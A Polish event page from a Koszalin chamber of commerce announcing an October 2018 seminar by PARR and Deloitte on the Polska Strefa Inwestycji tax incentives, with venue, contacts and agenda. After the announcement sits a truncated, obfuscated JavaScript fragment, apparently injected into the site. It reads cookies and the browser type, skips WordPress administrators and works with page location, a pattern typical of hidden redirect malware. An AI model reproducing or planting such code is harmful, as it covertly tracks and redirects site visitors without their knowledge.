Nowe narzędzia wsparcia dla rozwoju przedsiębiorców i samorządów | Północna Izba Gospodarcza w Koszalinie

Serdecznie zapraszamy Państwa na seminarium organizowane przez Pomorską Agencję Rozwoju Regionalnego S.A. oraz Deloitte, które odbędzie się 9 października 2018r. w Koszalinie w City Box.

Tematem przewodnim spotkania będzie omówienie nowego instrumentu wsparcia inwestycji w ramach uchwalonego rządowego programu Polska Strefa Inwestycji, dzięki któremu zachęty podatkowe dla przedsiębiorców są dostępne w każdej gminie, na terytorium całej Polski, niezależnie od statusu właściciela gruntów (nieruchomości JST, Skarbu Państwa i prywatne). Na mocy nowych przepisów każdy przedsiębiorca planujący realizację nowej inwestycji/reinwestycji będzie mógł starać się o uzyskanie zwolnienia w podatku dochodowym.

Data:
9 października 2018r. (wtorek)
godz. 09:30 –12:30

Miejsce:
City Box Koszalin
Rynek Staromiejski 14

Kontakt:
Iwona Urbańska
Tel. 601 619 537
iurbanska@deloittece.com

PARR S.A.
Tel. 59 840 11 73
promocja@parr.slupsk.pl

Partnerem spotkanie jest Miasto Koszalin.

Udział w spotkaniu jest bezpłatny. Decyduje kolejność zgłoszeń. Ilość miejsc jest ograniczona. Z jednego samorządu / przedsiębiorstwa w spotkaniu mogą wziąć udział max. 2 osoby. Więcej informacji na: www.sse.slupsk.pl.

Prosimy o elektroniczne potwierdzenie udziału do dnia 05.10.2018 do godziny 14.00.
Strona rejestracji https://www2.deloitte.com/pl/pl/pages/events/events/nowe-narzedzia-wsparcia-dla-przedsiebiorcow-i-samorzadow-Koszalin.html

 

Agenda

9.30-10.00 Rejestracja uczestników, powitalna kawa
10:00-10:05 Powitanie uczestników, rozpoczęcie seminarium
10:05-11:05 Polska Strefa Inwestycji – nowy program zachęt inwestycyjnych dla firm planujących nowe inwestycje/reinwestycje z uwzględnieniem zwolnień w podatku dochodowym. Ulga na działalność badawczo-rozwojową

Krzysztof Wojtowicz – Partner Associate w dziale Doradztwa Podatkowego, Deloitte Doradztwo Podatkowe Tokarski i Wspólnicy sp.k.

11:05-11:20 Rola PARR w ramach Polskiej Strefy Inwestycji – działania na rzecz przedsiębiorców i samorządów

Bartosz Świtała, Z-ca Kierownika, Zespół ds. Promocji i Pozyskiwania Inwestorów – PARR S.A.

11:20-11:40 Pozapłacowe systemy motywacyjne pracowników.

Beata Sławkowska-Domurad, Dyrektor Działu Rozwoju Regionalnego, PARR S.A.

11:40-11:50 Poręczenia kredytów, leasingów i wadiów przetargowych dla mikro, małych i średnich przedsiębiorstw

Łukasz Cieszyński – Dyrektor ds. poręczeń Funduszu Pomerania, Cezary Szeliga – Pełnomocnik ds. JST Funduszu Pomerania

11:50-12:30 Rozmowy kuluarowe przy poczęstunku

Serdecznie zapraszamy!

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m